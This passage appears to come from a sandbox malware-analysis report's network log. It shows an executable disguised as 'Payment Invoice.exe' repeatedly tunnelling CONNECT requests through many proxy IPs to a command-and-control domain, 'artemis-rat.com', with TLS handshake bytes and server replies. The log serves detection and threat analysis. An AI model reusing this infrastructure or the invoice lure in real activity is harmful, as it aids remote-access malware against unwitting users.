                                                                Mar 11, 2024 16:15:16.792673111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.966032028 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:16.966643095 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 03 90 54 ab fb 09 e1 be eb e8 63 7c 49 78 90 42 12 13 f2 1c 80 32 54 ba 03 43 a6 83 13 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e Tc|IxB2TC*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:17.139341116 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 13 6d b8 61 84 76 4e d4 67 85 23 80 73 1d 2f 30 30 6b c8 27 13 8e e5 21 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9mavNg#s/00k'!DOWNGRD0000*H010Uartemis-rat.com0240311141528Z260311141528Z010Uartemis-rat.com0"0*H0Ob-F>Ce2
                                                                Mar 11, 2024 16:15:17.246254921 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 17 cc 53 16 b9 b2 4c d9 9e df cf b1 9e 7d 26 42 b2 69 d5 1a a6 69 88 5f 9b 20 cc 66 d9 4a 0b 09 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 78 8f 13 30 3a fd c6 03 c4 e3 10 0d bd 58 60 07 5f c7 0b 2e 61
                                                                Data Ascii: %! SL}&Bii_ fJ(x0:X`_.aPv
                                                                Mar 11, 2024 16:15:17.417870998 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 e6 2c 7a 64 81 59 d4 d7 a0 da a5 ff 92 6c 7d 6c 7d 83 1a 64 7d 26 66 83 0d 25 46 c0 d5 b9 85 cc ea 58 7f d0 2b a8 d2 1e
                                                                Data Ascii: (,zdYl}l}d}&f%FX+


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                579192.168.2.45174272.10.160.90210117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.797599077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.891741037 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                580192.168.2.452013200.111.182.64437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.801295042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                581192.168.2.452017200.111.182.64437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.803129911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                582192.168.2.452020200.111.182.64437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.804425001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                583192.168.2.452025200.111.182.64437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.806148052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                584192.168.2.451160202.40.181.220312477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.812714100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                585192.168.2.451593103.49.202.252807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.813087940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                586192.168.2.45166947.242.15.120156737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.815567970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                587192.168.2.45179967.43.236.2067057076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.825252056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.564783096 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                588192.168.2.45173952.151.210.20490007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.825861931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                589192.168.2.45181067.43.236.20131757076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.826989889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.057461977 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                590192.168.2.451848104.24.220.52807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.829075098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.983679056 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                591192.168.2.451860172.67.105.234807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.829829931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.984092951 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                592192.168.2.451584103.190.54.14180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.832518101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                593192.168.2.451618110.78.82.23356787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.838424921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                594192.168.2.451648134.209.105.20931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.838762999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.326987028 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                595192.168.2.451891188.114.99.171807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.844575882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.998816013 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                596192.168.2.451879162.159.242.8807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.846796036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.007719994 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                597192.168.2.451882162.159.247.57807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.847783089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.008691072 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                598192.168.2.451904104.19.5.247807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.848917007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.003411055 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                599192.168.2.451686147.75.34.86100077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.850275993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.152003050 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                600192.168.2.451588116.199.168.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.851459026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                601192.168.2.45210043.157.47.74437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.851643085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                602192.168.2.45210243.157.47.74437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.852253914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                603192.168.2.45210343.157.47.74437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.853399992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                604192.168.2.45210543.157.47.74437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.857696056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                605192.168.2.45168251.75.125.208270297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.864774942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.625159979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.559273958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557542086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386873007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.123934031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                606192.168.2.451928172.67.181.32807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.864881039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.019227982 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                607192.168.2.451917104.238.111.107300267076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.867099047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.307971954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.824820995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
